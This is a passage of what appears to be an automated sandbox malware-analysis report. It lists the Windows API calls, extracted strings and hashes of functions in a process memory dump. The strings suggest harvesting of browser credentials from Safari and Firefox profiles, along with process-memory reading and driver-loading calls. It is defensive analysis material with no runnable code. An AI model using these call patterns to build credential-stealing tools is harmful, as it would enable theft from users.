                                                                                            • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                            • CloseClipboard.USER32 ref: 004098D7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                            • String ID:
                                                                                            • API String ID: 2014503067-0
                                                                                            • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                            • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                            • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                            • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetLastError.KERNEL32 ref: 004182D7
                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                            • LocalFree.KERNEL32(?), ref: 00418342
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                            • String ID: OsError 0x%x (%u)
                                                                                            • API String ID: 403622227-2664311388
                                                                                            • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                            • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                            • OpenClipboard.USER32(?), ref: 00411878
                                                                                            • GetLastError.KERNEL32 ref: 0041188D
                                                                                            • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                                                              • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                              • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                              • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                              • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                              • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                              • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                              • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                              • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                              • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                                                                            • String ID:
                                                                                            • API String ID: 1203541146-0
                                                                                            • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                            • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                            • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                            • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@memcpymemset
                                                                                            • String ID:
                                                                                            • API String ID: 1865533344-0
                                                                                            • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                            • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                            • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                            • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Version
                                                                                            • String ID:
                                                                                            • API String ID: 1889659487-0
                                                                                            • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                            • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                            • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                            • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                            • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                            • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                            • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • _wcsicmp.MSVCRT ref: 004022A6
                                                                                            • _wcsicmp.MSVCRT ref: 004022D7
                                                                                            • _wcsicmp.MSVCRT ref: 00402305
                                                                                            • _wcsicmp.MSVCRT ref: 00402333
                                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                            • memset.MSVCRT ref: 0040265F
                                                                                            • memcpy.MSVCRT ref: 0040269B
                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                            • memcpy.MSVCRT ref: 004026FF
                                                                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                            • API String ID: 577499730-1134094380
                                                                                            • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                            • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                            • String ID: :stringdata$ftp://$http://$https://
                                                                                            • API String ID: 2787044678-1921111777
                                                                                            • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                            • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                            • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                            • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                            • GetDC.USER32 ref: 004140E3
                                                                                            • wcslen.MSVCRT ref: 00414123
                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                            • _snwprintf.MSVCRT ref: 00414244
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                            • String ID: %s:$EDIT$STATIC
                                                                                            • API String ID: 2080319088-3046471546
                                                                                            • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                            • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • EndDialog.USER32(?,?), ref: 00413221
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                            • memset.MSVCRT ref: 00413292
                                                                                            • memset.MSVCRT ref: 004132B4
                                                                                            • memset.MSVCRT ref: 004132CD
                                                                                            • memset.MSVCRT ref: 004132E1
                                                                                            • memset.MSVCRT ref: 004132FB
                                                                                            • memset.MSVCRT ref: 00413310
                                                                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                            • memset.MSVCRT ref: 004133C0
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                            • memcpy.MSVCRT ref: 004133FC
                                                                                            • wcscpy.MSVCRT ref: 0041341F
                                                                                            • _snwprintf.MSVCRT ref: 0041348E
                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                            • SetFocus.USER32(00000000), ref: 004134B7
                                                                                            Strings
                                                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                            • {Unknown}, xrefs: 004132A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                            • API String ID: 4111938811-1819279800
                                                                                            • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                            • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                            • EndDialog.USER32(?,?), ref: 0040135E
                                                                                            • DeleteObject.GDI32(?), ref: 0040136A
                                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                            • ShowWindow.USER32(00000000), ref: 00401398
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                            • String ID:
                                                                                            • API String ID: 829165378-0
                                                                                            • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                            • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            • wcscpy.MSVCRT ref: 004041D6
                                                                                            • wcscpy.MSVCRT ref: 004041E7
                                                                                            • memset.MSVCRT ref: 00404200
                                                                                            • memset.MSVCRT ref: 00404215
                                                                                            • _snwprintf.MSVCRT ref: 0040422F
                                                                                            • wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 0040426E
                                                                                            • memset.MSVCRT ref: 004042CD
                                                                                            • memset.MSVCRT ref: 004042E2
                                                                                            • _snwprintf.MSVCRT ref: 004042FE
                                                                                            • wcscpy.MSVCRT ref: 00404311
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                            • API String ID: 2454223109-1580313836
                                                                                            • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                            • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                            • memcpy.MSVCRT ref: 004115C8
                                                                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                            • API String ID: 4054529287-3175352466
                                                                                            • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                            • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                            • API String ID: 3143752011-1996832678
                                                                                            • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                            • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                            • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                            • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                            • API String ID: 667068680-2887671607
                                                                                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                            • API String ID: 1607361635-601624466
                                                                                            • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                            • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                            • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
